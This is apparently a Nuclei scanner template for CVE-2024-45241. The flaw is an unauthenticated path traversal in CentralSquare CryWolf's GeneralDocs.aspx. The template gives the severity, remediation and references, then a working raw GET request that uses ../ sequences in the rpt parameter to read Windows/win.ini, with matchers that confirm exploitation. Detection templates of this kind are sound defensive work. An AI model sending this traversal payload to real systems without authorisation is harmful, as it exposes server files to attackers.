id: CVE-2024-45241 info: name: CentralSquare CryWolf - Path Traversal author: s4e-io severity: high description: | A traversal vulnerability in GeneralDocs.aspx in CentralSquare CryWolf (False Alarm Management) through 2024-08-09 allows unauthenticated attackers to read files outside of the working web directory via the rpt parameter, leading to the disclosure of sensitive information. impact: | Unauthenticated attackers can read arbitrary files from the server via path traversal, exposing sensitive information. remediation: | Update CentralSquare CryWolf to a version later than 2024-08-09 that patches the path traversal vulnerability. reference: - https://www.tenable.com/cve/CVE-2024-45241 - https://daly.wtf/cve-2024-45241-path-traversal-in-centralsquare-crywolf/ - https://github.com/d4lyw/CVE-2024-45241/ classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2024-45241 epss-score: 0.13623 epss-percentile: 0.96091 cpe: cpe:2.3:a:centralsquare:crywolf:2024-08-09:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: centralsquare product: crywolf fofa-query: "False Alarm Reduction Website" tags: cve,cve2024,lfi,centralsquare,crywolf,vuln flow: http(1) && http(2) http: - raw: - | GET /GeneralDocs.aspx?rpt=../../../../Windows/win.ini HTTP/1.1 Host: {{Hostname}} matchers: - type: dsl dsl: - 'contains(body,"Powered by CryWolf")' - 'status_code == 200' condition: and internal: true - raw: - | GET /gdoc1.ashx HTTP/1.1 Host: {{Hostname}} matchers: - type: dsl dsl: - 'contains_all(body,"bit app support","fonts","extensions")' - 'contains(content_type,"application/pdf")' - 'status_code == 200' condition: and # digest: 4a0a0047304502200745f7e31aa7d0bee63b50bfeac3b573834391d6a1b60142d08a2b88cd70afcf022100e5795ada3458b16890de283f087f7451ef69c7f82ad4b940547be66732c16c15:922c64590222798bb761d5b6d8e72950